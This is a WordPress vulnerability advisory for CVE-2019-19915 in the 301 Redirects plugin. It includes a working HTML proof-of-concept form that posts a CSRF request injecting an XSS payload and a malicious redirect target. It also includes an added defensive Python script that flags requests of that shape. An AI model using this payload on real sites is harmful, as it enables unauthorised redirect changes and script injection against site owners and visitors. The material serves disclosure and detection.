301 Redirects - Easy Redirect Manager <= 2.40 - Authenticated Arbitrary Redirect Injection and Modification, XSS, and CSRF



Description
The weaknesses allow any authenticated user, even a subscriber, to modify, delete, and inject redirect rules, which could result in a loss of site availability, in addition to XSS and CSRF.
Proof of Concept
<html>
  <body>
    <form action="[URL]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="eps&#95;redirect&#95;save" />
      <input type="hidden" name="id" value="<BODY ONLOAD=alert(1)>" />
      <input type="hidden" name="status" value="301" />
      <input type="hidden" name="url&#95;from" value="" />
      <input type="hidden" name="url&#95;to" value="[MALICIOUS-SITE]" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
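
For defenders reviewing captured traffic, the following is an added example (not part of the original advisory and not the plugin's code) that triages POST requests to the eps_redirect_save action using the parameters shown in the proof of concept. The request dictionary layout, the SITE_HOST value, the finding labels and the sample requests are assumptions made for illustration, and it presumes the capture source records request bodies.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

SITE_HOST = "blog.example.test"         # assumption: hostname of the protected site
AJAX_PATH = "/wp-admin/admin-ajax.php"  # endpoint the PoC form posts to
ACTION = "eps_redirect_save"            # AJAX action named in the PoC

def host_of(url):
    """Hostname of an absolute or scheme-less URL, or None if it cannot be parsed."""
    try:
        return urlsplit(url if "//" in url else "//" + url).hostname
    except ValueError:
        return None

def triage(req):
    """Return findings for one captured request; an empty list means not flagged."""
    if req["method"] != "POST" or urlsplit(req["path"]).path != AJAX_PATH:
        return []
    # keep_blank_values keeps the empty url_from that the PoC sends
    params = {k: v[0] for k, v in parse_qs(req["body"], keep_blank_values=True).items()}
    if params.get("action") != ACTION:
        return []
    findings = []
    # Assumption: a rule id is numeric, so anything else (such as markup) is suspect.
    if not re.fullmatch(r"[0-9]*", params.get("id", "")):
        findings.append("non-numeric id")
    # A save that did not originate from the site's own pages has the CSRF shape.
    source = req["headers"].get("Origin") or req["headers"].get("Referer", "")
    if host_of(source) != SITE_HOST:
        findings.append("missing or cross-site origin")
    # Destinations that are not a local path and leave the site deserve review.
    dest = params.get("url_to", "")
    local_path = dest.startswith("/") and not dest.startswith("//")
    if dest and not local_path and host_of(dest) != SITE_HOST:
        findings.append("off-site url_to")
    return findings

# Constructed sample requests (not real traffic).
POC_SHAPED = {"method": "POST", "path": AJAX_PATH,
              "headers": {"Origin": "https://attacker.example.test"},
              "body": urlencode({"action": ACTION, "id": "<BODY ONLOAD=alert(1)>", "status": "301",
                                 "url_from": "", "url_to": "https://attacker.example.test/"})}
ROUTINE = {"method": "POST", "path": AJAX_PATH,
           "headers": {"Origin": "https://blog.example.test"},
           "body": urlencode({"action": ACTION, "id": "12", "status": "301",
                              "url_from": "old-page", "url_to": "/new-page"})}

if __name__ == "__main__":
    print(triage(POC_SHAPED), triage(ROUTINE))
```

These checks cannot see the caller's role, so a same-site request sent from a subscriber account is flagged only when its parameters are unusual.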

Affects Plugin

References

CVE 2019-19915
URL https://www.wordfence.com/blog/2019/12/critical-vulnerability-patched-in-301-redirects-easy-redirect-manager/

Classification

Type BYPASS

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 99493
Verified No
WPVDB ID 9979

Timeline

Publicly Published 2019-12-19 (about 1 month ago)
Added 2019-12-19 (about 1 month ago)
Last Updated 2019-12-21 (about 1 month ago)
